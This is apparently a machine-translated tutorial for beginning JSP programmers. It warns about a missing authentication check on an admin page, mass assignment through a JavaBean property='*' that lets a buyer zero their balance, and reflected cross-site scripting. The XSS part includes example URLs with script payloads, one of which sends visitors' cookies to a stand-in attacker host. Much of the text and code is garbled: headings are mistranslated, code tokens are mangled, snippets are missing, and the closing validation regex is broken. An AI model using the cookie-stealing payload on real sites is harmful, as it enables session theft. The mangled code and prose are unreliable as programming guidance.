Java Server Page (JSP) as a technique for establishing a dynamic web page is constantly warming. JSP and ASP, PHP, working mechanism are not the same. Generally speaking, the JSP page is compiled during execution, not explanatory. The first calling JSP file is actually a process of compiling as a servlet. When the browser requests this JSP file to the server, the server will check if the JSP file has changed since the last compiled. If there is no change, it will execute the servlet directly, and it is not necessary to recompile, so that efficiency has been significantly improved. .
Today I will look at the security of JSP from the perspective of scripting from scripting, such as source exposure, is not within the scope of this article. The main purpose of writing this article is to give the beginner JSP programming friends to wake up, from the beginning, we must cultivate a sense of security programming, do not make mistakes that should not be made to avoid the loss of avoidance. In addition, I am also an initiator, please enlighten me if there is a mistake or other comments.
First, the certification is not strict - low-level mistakes
In the Ocean Forum v1.12 revision, user_manager.jsp is the user-managed page, the author knows its sensitivity, plus a lock:
IF (("" ") == NULL) ││ (" UserClass ") == NULL) ││ (! Session.getValue (" UserClass "). Equals (" System Administrator " ))) {response.sendredirect ("err.jsp? id = 14"); return;}
If you want to view, modify the information of a user, you must use the modifyuser_manager.jsp this file. Administrator submit
That is to view, the information of the user who modifies the ID 51 (the administrator's default user ID is 51). However, such an important file lacks authentication, ordinary users (including tourists) also directly submit the above request, and there is no such thing as a list (password is also a plain text storage, displayed). Modifyuser_manage.jsp also is the portal open until the malicious user performs the operation of the data update, and he will see the wrong display of the wrong display when the data update is performed. Obviously, it is not enough to lock a door. When programming, you must not be annoying to add an identity authentication for each of the added identity.
Second, keep the entrance to javabean
The core of JSP component technology is a Java component called bean. In the program, logic control, database operations are placed in the JavaBeans component, then call it in the JSP file, which increases the clarity of the program and the reusability of the program. The JSP page is very concise compared to traditional ASP or PHP pages, because many dynamic page processing can be encapsulated into JavaBean.
To change the JavaBean property, use the "" tag. The following code is part of the source code of an electronic shopping system, which is used to display information in the user's shopping box, and checkout.jsp is used to check out.
You Have Added The Item to Your Basket. Your Total IS $ Proced to Checkout
Note Property = "*"? This indicates that the user enters in the visible JSP page, or the value of all variables submitted directly through the query string will be stored in the matching bea property.
Generally, the user is the submit request: http://www.somesite.com /addtobasket.jsp?newItem=Item0105342 But what is the user who does not defend? They may be submitted: http://www.somesite.com /addtobasket.jsp?newitem=Item0105342&balance=0 This information is stored in JavaBean in the JavaBean. When they click "Chekout" to check out, the cost is free.
This is the same as the safety problem caused by global variables in PHP. This shows: "Property =" * "" must be used with caution!
Third, Changsheng's unneained cross-station script
Cross Scripting Attack refers to the HTML code in the remote web page, inserts malicious JavaScript, VBScript, Activex, HTML, or Flash and other scripts, stealing the privacy of users of this page, changing the user's settings, Destroy the user's data. Cross-station scripting attacks do not affect the operation of the server and web program in most cases, but the security of the client constitutes a serious threat.
The simplest example is given by an imitation network. When we submit http://www.somesite.com/acjspbbs/dispuser.jsp?name =someuser<;Script>Alert (Document.cuokie) The dialog box contains your own cookie information. Submit http://www.somesite.com/acjspbbs/dispuser.jsp?name =someuser<;script ketocument.location='http://www.163.com 'to redirect to Netease.
Since the script does not perform any encoded or filter malicious code when returning to the "Name" variable, the script code can be executed on the user browser when the user accesses the malicious "Name" variable data link. User privacy leaks and other consequences. For example, the following link: http://www.somesite.com/acjspbbs/dispuser.jsp? Name = Someuser <; script> Document.Location = 'http://www.hackersite.com/xxx.xxx? Document .kekie
XXX.xxx is used to collect parameters followed by side, and the parameters here are Document.cookie, which is the cookie of users who are accessing this link. In the ASP world, many people have practiced the technology of stealing cookie. In JSP, reading cookies is not difficult. Of course, the cross-station script will never be limited to the function of stealing cookie, I believe everyone has a certain understanding, here is not expanding.
Both the inputs and outputs of all dynamic pages should be encoded, which can greatly avoid attacks of cross-station scripts. Unfortunately, all invisible data codes is a resource-intensive job that will affect the performance of the Web server. A commonly used means or filtering, such as the following code, replace the dangerous characters:
A more active way is to use the regular expression that allows only the specified character:
Public Boolean Isvalidinput (String Str) {IF (Str.Matches ("[A-Z0-9] ")) Return True; Else Return False;}
